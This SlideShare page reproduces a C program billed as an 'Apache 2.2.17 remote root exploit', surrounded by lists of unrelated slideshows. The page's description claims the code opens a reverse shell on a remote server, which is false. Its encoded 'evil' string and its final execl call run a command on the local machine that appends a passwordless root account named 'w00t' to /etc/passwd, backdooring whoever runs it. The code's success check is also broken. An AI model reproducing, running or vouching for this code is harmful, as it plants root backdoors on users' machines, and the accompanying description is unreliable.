SlideShare ist ein Scribd-Unternehmen logo

Yg byev2e

Als TXT, PDF herunterladen
longphi2812
longphi2812

This C code defines an exploit that can be used to remotely gain root access on an Apache 2.2.17 server by sending a crafted buffer to port 80. It includes encoded shellcode that executes a reverse shell, and builds a buffer containing NOP sleds, shellcode, and trailing characters to exploit a vulnerability. It connects to the target, sends the malicious buffer, and waits for a reverse shell if successful.

1 von 2
/* apachesm4sh.c apache 2.2.17 remote root exploit*/ /* KEEP PRIV8&!&! leak and i will find you :) ~ desg */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <strings.h> #include <netdb.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> char evil[] = "xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89" "x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89" "x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8" "xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23" "x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74" "x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a" "x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68" "x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64" "x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44" "x44x44"; #define NOP 0x90 #define BSIZE 1000 #define OFFSET 400 #define ADDR 0xbffff658 #define ASIZE 2000 int main(int argc, char *argv[]) { char *buffer; int s; struct hostent *hp; struct sockaddr_in sin; if (argc != 2) { printf("%s <target>n", argv[0]); exit(1); } buffer = (char *) malloc(BSIZE + ASIZE + 100); if (buffer == NULL) { printf("Not enough memoryn"); exit(1); } memcpy(&buffer[BSIZE - strlen(evil)], evil, strlen(evil)); buffer[BSIZE + ASIZE] = ';'; buffer[BSIZE + ASIZE + 1] = '0'; hp = gethostbyname(argv[1]); if (hp == NULL) { printf("no such servern"); exit(1); } bzero(&sin, sizeof(sin)); bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(80); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { printf("Can't open socketn");
exit(1); } if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { printf("Connection refusedn"); exit(1); } printf("sending exploit code...n"); if (send(s, buffer, strlen(buffer), 0) != 1) printf("exploit was successful!n"); else printf("sorry, this site isn't vulnerablen"); printf("waiting for shell.....n"); if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL); while (1) { /* shell */ } }

Empfohlen

ZeroMQ: Messaging Made Simple
ZeroMQ: Messaging Made SimpleZeroMQ: Messaging Made Simple
ZeroMQ: Messaging Made SimpleIan Barber
 
ZeroMQ Is The Answer: DPC 11 Version
ZeroMQ Is The Answer: DPC 11 VersionZeroMQ Is The Answer: DPC 11 Version
ZeroMQ Is The Answer: DPC 11 VersionIan Barber
 
ZeroMQ Is The Answer
ZeroMQ Is The AnswerZeroMQ Is The Answer
ZeroMQ Is The AnswerIan Barber
 
Chat code
Chat codeChat code
Chat codemanish bhandare
 
プログラム実行の話と
OSとメモリの挙動の話
プログラム実行の話と
OSとメモリの挙動の話プログラム実行の話と
OSとメモリの挙動の話
プログラム実行の話と
OSとメモリの挙動の話tatsunori ishikawa
 
How to stand on the shoulders of giants
How to stand on the shoulders of giantsHow to stand on the shoulders of giants
How to stand on the shoulders of giantsIan Barber
 
Créer une base NoSQL en 1 heure
Créer une base NoSQL en 1 heureCréer une base NoSQL en 1 heure
Créer une base NoSQL en 1 heureAmaury Bouchard
 
Отладка в GDB
Отладка в GDBОтладка в GDB
Отладка в GDBAnthony Shoumikhin
 

Empfohlen

ZeroMQ: Messaging Made Simple
ZeroMQ: Messaging Made SimpleZeroMQ: Messaging Made Simple
ZeroMQ: Messaging Made SimpleIan Barber
 
ZeroMQ Is The Answer: DPC 11 Version
ZeroMQ Is The Answer: DPC 11 VersionZeroMQ Is The Answer: DPC 11 Version
ZeroMQ Is The Answer: DPC 11 VersionIan Barber
 
ZeroMQ Is The Answer
ZeroMQ Is The AnswerZeroMQ Is The Answer
ZeroMQ Is The AnswerIan Barber
 
Chat code
Chat codeChat code
Chat codemanish bhandare
 
プログラム実行の話と
OSとメモリの挙動の話
プログラム実行の話と
OSとメモリの挙動の話プログラム実行の話と
OSとメモリの挙動の話
プログラム実行の話と
OSとメモリの挙動の話tatsunori ishikawa
 
How to stand on the shoulders of giants
How to stand on the shoulders of giantsHow to stand on the shoulders of giants
How to stand on the shoulders of giantsIan Barber
 
Créer une base NoSQL en 1 heure
Créer une base NoSQL en 1 heureCréer une base NoSQL en 1 heure
Créer une base NoSQL en 1 heureAmaury Bouchard
 
Отладка в GDB
Отладка в GDBОтладка в GDB
Отладка в GDBAnthony Shoumikhin
 
Assignment no39
Assignment no39Assignment no39
Assignment no39Jay Patel
 
Arp
ArpArp
ArpEbsil Sherly
 
20110424 action scriptを使わないflash勉強会
20110424 action scriptを使わないflash勉強会20110424 action scriptを使わないflash勉強会
20110424 action scriptを使わないflash勉強会Hiroki Mizuno
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionIan Barber
 
Teaching Your Machine To Find Fraudsters
Teaching Your Machine To Find FraudstersTeaching Your Machine To Find Fraudsters
Teaching Your Machine To Find FraudstersIan Barber
 
Source Code of Building Linux IPv6 DNS Server (Complete Sourcecode)
Source Code of Building Linux IPv6 DNS Server (Complete Sourcecode)Source Code of Building Linux IPv6 DNS Server (Complete Sourcecode)
Source Code of Building Linux IPv6 DNS Server (Complete Sourcecode)Hari
 
Os Practical Assignment 1
Os Practical Assignment 1Os Practical Assignment 1
Os Practical Assignment 1Emmanuel Garcia
 
システムコールトレーサーの動作原理と実装 (Writing system call tracer for Linux/x86)
システムコールトレーサーの動作原理と実装 (Writing system call tracer for Linux/x86)システムコールトレーサーの動作原理と実装 (Writing system call tracer for Linux/x86)
システムコールトレーサーの動作原理と実装 (Writing system call tracer for Linux/x86)Masashi Shibata
 
festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...
festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...
festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...festival ICT 2016
 
C99[2]
C99[2]C99[2]
C99[2]guest8914af
 
Rop and it's friends
Rop and it's friendsRop and it's friends
Rop and it's friendsnuc13us
 
C99.php
C99.phpC99.php
C99.phpveng33k
 
Learning Dtrace
Learning DtraceLearning Dtrace
Learning DtraceJeongHun Byeon
 
Commencer avec le TDD
Commencer avec le TDDCommencer avec le TDD
Commencer avec le TDDEric Hogue
 
Shell Scripting
Shell ScriptingShell Scripting
Shell Scriptingdcarneir
 
我在豆瓣使用Emacs
我在豆瓣使用Emacs我在豆瓣使用Emacs
我在豆瓣使用Emacs董 伟明
 
Guarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous TestingGuarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous TestingEric Hogue
 
Snake.c
Snake.cSnake.c
Snake.cVijay Singh
 
FrontDays #3. Иван Федяев, Эволюция JavaScript. Обзор нововведений ECMAScript 6
FrontDays #3. Иван Федяев, Эволюция JavaScript. Обзор нововведений ECMAScript 6FrontDays #3. Иван Федяев, Эволюция JavaScript. Обзор нововведений ECMAScript 6
FrontDays #3. Иван Федяев, Эволюция JavaScript. Обзор нововведений ECMAScript 6FrontDays
 
Ssaw08 0624
Ssaw08 0624Ssaw08 0624
Ssaw08 0624Atsushi Tadokoro
 
DLF PRIMUS
DLF PRIMUSDLF PRIMUS
DLF PRIMUSRealatix Consulting
 
Presentación colaborativa clase 3 subgrupo 1
Presentación colaborativa clase 3 subgrupo 1 Presentación colaborativa clase 3 subgrupo 1
Presentación colaborativa clase 3 subgrupo 1 Maria Victoria Beltran Granillo
 

Weitere ähnliche Inhalte

Was ist angesagt?

Assignment no39
Assignment no39Assignment no39
Assignment no39Jay Patel
 
20110424 action scriptを使わないflash勉強会
20110424 action scriptを使わないflash勉強会20110424 action scriptを使わないflash勉強会
20110424 action scriptを使わないflash勉強会Hiroki Mizuno
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionIan Barber
 
Teaching Your Machine To Find Fraudsters
Teaching Your Machine To Find FraudstersTeaching Your Machine To Find Fraudsters
Teaching Your Machine To Find FraudstersIan Barber
 
Source Code of Building Linux IPv6 DNS Server (Complete Sourcecode)
Source Code of Building Linux IPv6 DNS Server (Complete Sourcecode)Source Code of Building Linux IPv6 DNS Server (Complete Sourcecode)
Source Code of Building Linux IPv6 DNS Server (Complete Sourcecode)Hari
 
Os Practical Assignment 1
Os Practical Assignment 1Os Practical Assignment 1
Os Practical Assignment 1Emmanuel Garcia
 
システムコールトレーサーの動作原理と実装 (Writing system call tracer for Linux/x86)
システムコールトレーサーの動作原理と実装 (Writing system call tracer for Linux/x86)システムコールトレーサーの動作原理と実装 (Writing system call tracer for Linux/x86)
システムコールトレーサーの動作原理と実装 (Writing system call tracer for Linux/x86)Masashi Shibata
 
festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...
festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...
festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...festival ICT 2016
 
Rop and it's friends
Rop and it's friendsRop and it's friends
Rop and it's friendsnuc13us
 
Commencer avec le TDD
Commencer avec le TDDCommencer avec le TDD
Commencer avec le TDDEric Hogue
 
Shell Scripting
Shell ScriptingShell Scripting
Shell Scriptingdcarneir
 
我在豆瓣使用Emacs
我在豆瓣使用Emacs我在豆瓣使用Emacs
我在豆瓣使用Emacs董 伟明
 
Guarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous TestingGuarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous TestingEric Hogue
 
FrontDays #3. Иван Федяев, Эволюция JavaScript. Обзор нововведений ECMAScript 6
FrontDays #3. Иван Федяев, Эволюция JavaScript. Обзор нововведений ECMAScript 6FrontDays #3. Иван Федяев, Эволюция JavaScript. Обзор нововведений ECMAScript 6
FrontDays #3. Иван Федяев, Эволюция JavaScript. Обзор нововведений ECMAScript 6FrontDays
 

Was ist angesagt? (20)

Assignment no39
Assignment no39Assignment no39
Assignment no39
 
Arp
ArpArp
Arp
 
20110424 action scriptを使わないflash勉強会
20110424 action scriptを使わないflash勉強会20110424 action scriptを使わないflash勉強会
20110424 action scriptを使わないflash勉強会
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 Version
 
Teaching Your Machine To Find Fraudsters
Teaching Your Machine To Find FraudstersTeaching Your Machine To Find Fraudsters
Teaching Your Machine To Find Fraudsters
 
Source Code of Building Linux IPv6 DNS Server (Complete Sourcecode)
Source Code of Building Linux IPv6 DNS Server (Complete Sourcecode)Source Code of Building Linux IPv6 DNS Server (Complete Sourcecode)
Source Code of Building Linux IPv6 DNS Server (Complete Sourcecode)
 
Os Practical Assignment 1
Os Practical Assignment 1Os Practical Assignment 1
Os Practical Assignment 1
 
システムコールトレーサーの動作原理と実装 (Writing system call tracer for Linux/x86)
システムコールトレーサーの動作原理と実装 (Writing system call tracer for Linux/x86)システムコールトレーサーの動作原理と実装 (Writing system call tracer for Linux/x86)
システムコールトレーサーの動作原理と実装 (Writing system call tracer for Linux/x86)
 
festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...
festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...
festival ICT 2013: Solid as diamond: use ruby in an web application penetrati...
 
C99[2]
C99[2]C99[2]
C99[2]
 
Rop and it's friends
Rop and it's friendsRop and it's friends
Rop and it's friends
 
C99.php
C99.phpC99.php
C99.php
 
Learning Dtrace
Learning DtraceLearning Dtrace
Learning Dtrace
 
Commencer avec le TDD
Commencer avec le TDDCommencer avec le TDD
Commencer avec le TDD
 
Shell Scripting
Shell ScriptingShell Scripting
Shell Scripting
 
我在豆瓣使用Emacs
我在豆瓣使用Emacs我在豆瓣使用Emacs
我在豆瓣使用Emacs
 
Guarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous TestingGuarding Your Code Against Bugs with Continuous Testing
Guarding Your Code Against Bugs with Continuous Testing
 
Snake.c
Snake.cSnake.c
Snake.c
 
FrontDays #3. Иван Федяев, Эволюция JavaScript. Обзор нововведений ECMAScript 6
FrontDays #3. Иван Федяев, Эволюция JavaScript. Обзор нововведений ECMAScript 6FrontDays #3. Иван Федяев, Эволюция JavaScript. Обзор нововведений ECMAScript 6
FrontDays #3. Иван Федяев, Эволюция JavaScript. Обзор нововведений ECMAScript 6
 
Ssaw08 0624
Ssaw08 0624Ssaw08 0624
Ssaw08 0624
 

Andere mochten auch

Sandra Viggers @ #smaccDUB - How students can coreograph their own education
Sandra Viggers @ #smaccDUB - How students can coreograph their own educationSandra Viggers @ #smaccDUB - How students can coreograph their own education
Sandra Viggers @ #smaccDUB - How students can coreograph their own educationMads Astvad
 
My resume Alfarisi Adjis
My resume Alfarisi AdjisMy resume Alfarisi Adjis
My resume Alfarisi AdjisAlfarisi Adjis
 
Hablar en el idioma del cliente
Hablar en el idioma del clienteHablar en el idioma del cliente
Hablar en el idioma del clienteSandro Barreto
 
Letter_of_Appreciation_-Feedback[1]
Letter_of_Appreciation_-Feedback[1]Letter_of_Appreciation_-Feedback[1]
Letter_of_Appreciation_-Feedback[1]Manjit Dey
 
Izabela Huskiewicz potwierdzenie zatrudnienia
Izabela Huskiewicz potwierdzenie zatrudnieniaIzabela Huskiewicz potwierdzenie zatrudnienia
Izabela Huskiewicz potwierdzenie zatrudnieniaIzabela Huskiewicz
 
Bitácora # 1
Bitácora # 1 Bitácora # 1
Bitácora # 1 Mateo Toro
 

Andere mochten auch (16)

DLF PRIMUS
DLF PRIMUSDLF PRIMUS
DLF PRIMUS
 
Presentación colaborativa clase 3 subgrupo 1
Presentación colaborativa clase 3 subgrupo 1 Presentación colaborativa clase 3 subgrupo 1
Presentación colaborativa clase 3 subgrupo 1
 
Omowunmi Abdulkareem As An IT-Attorney
Omowunmi Abdulkareem As An IT-AttorneyOmowunmi Abdulkareem As An IT-Attorney
Omowunmi Abdulkareem As An IT-Attorney
 
Sandra Viggers @ #smaccDUB - How students can coreograph their own education
Sandra Viggers @ #smaccDUB - How students can coreograph their own educationSandra Viggers @ #smaccDUB - How students can coreograph their own education
Sandra Viggers @ #smaccDUB - How students can coreograph their own education
 
CVEnSaugeNolwenn
CVEnSaugeNolwennCVEnSaugeNolwenn
CVEnSaugeNolwenn
 
HSIR-Samana Office
HSIR-Samana OfficeHSIR-Samana Office
HSIR-Samana Office
 
My resume Alfarisi Adjis
My resume Alfarisi AdjisMy resume Alfarisi Adjis
My resume Alfarisi Adjis
 
Hablar en el idioma del cliente
Hablar en el idioma del clienteHablar en el idioma del cliente
Hablar en el idioma del cliente
 
Letter_of_Appreciation_-Feedback[1]
Letter_of_Appreciation_-Feedback[1]Letter_of_Appreciation_-Feedback[1]
Letter_of_Appreciation_-Feedback[1]
 
Diapositiva los andes 1
Diapositiva los andes 1Diapositiva los andes 1
Diapositiva los andes 1
 
Izabela Huskiewicz potwierdzenie zatrudnienia
Izabela Huskiewicz potwierdzenie zatrudnieniaIzabela Huskiewicz potwierdzenie zatrudnienia
Izabela Huskiewicz potwierdzenie zatrudnienia
 
Angello Manuel Quinteros Cotrina
Angello Manuel Quinteros CotrinaAngello Manuel Quinteros Cotrina
Angello Manuel Quinteros Cotrina
 
Bitácora # 1
Bitácora # 1 Bitácora # 1
Bitácora # 1
 
CWI Cert
CWI CertCWI Cert
CWI Cert
 
Curriculum Vitae
Curriculum VitaeCurriculum Vitae
Curriculum Vitae
 
Taser
TaserTaser
Taser
 

Ähnlich wie Yg byev2e

evil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdfevil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdffortmdu
 
Scroll pHAT HD に美咲フォント
Scroll pHAT HD に美咲フォントScroll pHAT HD に美咲フォント
Scroll pHAT HD に美咲フォントYuriko IKEDA
 
Python 炒股指南
Python 炒股指南 Python 炒股指南
Python 炒股指南 Leo Zhou
 
Stupid Awesome Python Tricks
Stupid Awesome Python TricksStupid Awesome Python Tricks
Stupid Awesome Python TricksBryan Helmig
 
Practical File of C Language
Practical File of C LanguagePractical File of C Language
Practical File of C LanguageRAJWANT KAUR
 
Computer Networks Lab File
Computer Networks Lab FileComputer Networks Lab File
Computer Networks Lab FileKandarp Tiwari
 
#include stdio.h #include stdlib.h #include unistd.h #in.pdf
#include stdio.h #include stdlib.h #include unistd.h #in.pdf#include stdio.h #include stdlib.h #include unistd.h #in.pdf
#include stdio.h #include stdlib.h #include unistd.h #in.pdfcontact34
 
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)CODE BLUE
 
Yy
YyYy
Yyyygh
 
Yy
YyYy
Yyyygh
 
Nouveau document texte
Nouveau document texteNouveau document texte
Nouveau document texteSai Ef
 
Shell to be modified#include stdlib.h #include unistd.h .pdf
Shell to be modified#include stdlib.h #include unistd.h .pdfShell to be modified#include stdlib.h #include unistd.h .pdf
Shell to be modified#include stdlib.h #include unistd.h .pdfclarityvision
 

Ähnlich wie Yg byev2e (20)

evil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdfevil_server.cpp#include string #include cstdlib #include.pdf
evil_server.cpp#include string #include cstdlib #include.pdf
 
Circular queue
Circular queueCircular queue
Circular queue
 
Scroll pHAT HD に美咲フォント
Scroll pHAT HD に美咲フォントScroll pHAT HD に美咲フォント
Scroll pHAT HD に美咲フォント
 
C lab manaual
C lab manaualC lab manaual
C lab manaual
 
Python 炒股指南
Python 炒股指南 Python 炒股指南
Python 炒股指南
 
Stupid Awesome Python Tricks
Stupid Awesome Python TricksStupid Awesome Python Tricks
Stupid Awesome Python Tricks
 
Practical File of C Language
Practical File of C LanguagePractical File of C Language
Practical File of C Language
 
Computer Networks Lab File
Computer Networks Lab FileComputer Networks Lab File
Computer Networks Lab File
 
#include stdio.h #include stdlib.h #include unistd.h #in.pdf
#include stdio.h #include stdlib.h #include unistd.h #in.pdf#include stdio.h #include stdlib.h #include unistd.h #in.pdf
#include stdio.h #include stdlib.h #include unistd.h #in.pdf
 
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits  by Seok-Ha Lee (wh1ant)
 
C programms
C programmsC programms
C programms
 
C Programming lab
C Programming labC Programming lab
C Programming lab
 
Cpds lab
Cpds labCpds lab
Cpds lab
 
Usp
UspUsp
Usp
 
Yy
YyYy
Yy
 
Yy
YyYy
Yy
 
Nouveau document texte
Nouveau document texteNouveau document texte
Nouveau document texte
 
Buffer OverFlow
Buffer OverFlowBuffer OverFlow
Buffer OverFlow
 
Shell to be modified#include stdlib.h #include unistd.h .pdf
Shell to be modified#include stdlib.h #include unistd.h .pdfShell to be modified#include stdlib.h #include unistd.h .pdf
Shell to be modified#include stdlib.h #include unistd.h .pdf
 
Format String Exploitation
Format String ExploitationFormat String Exploitation
Format String Exploitation
 

Yg byev2e

  • 1. /* apachesm4sh.c apache 2.2.17 remote root exploit*/ /* KEEP PRIV8&!&! leak and i will find you :) ~ desg */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <strings.h> #include <netdb.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> char evil[] = "xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89" "x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89" "x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8" "xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23" "x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74" "x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a" "x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68" "x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64" "x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44" "x44x44"; #define NOP 0x90 #define BSIZE 1000 #define OFFSET 400 #define ADDR 0xbffff658 #define ASIZE 2000 int main(int argc, char *argv[]) { char *buffer; int s; struct hostent *hp; struct sockaddr_in sin; if (argc != 2) { printf("%s <target>n", argv[0]); exit(1); } buffer = (char *) malloc(BSIZE + ASIZE + 100); if (buffer == NULL) { printf("Not enough memoryn"); exit(1); } memcpy(&buffer[BSIZE - strlen(evil)], evil, strlen(evil)); buffer[BSIZE + ASIZE] = ';'; buffer[BSIZE + ASIZE + 1] = '0'; hp = gethostbyname(argv[1]); if (hp == NULL) { printf("no such servern"); exit(1); } bzero(&sin, sizeof(sin)); bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(80); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { printf("Can't open socketn");
  • 2. exit(1); } if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { printf("Connection refusedn"); exit(1); } printf("sending exploit code...n"); if (send(s, buffer, strlen(buffer), 0) != 1) printf("exploit was successful!n"); else printf("sorry, this site isn't vulnerablen"); printf("waiting for shell.....n"); if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL); while (1) { /* shell */ } }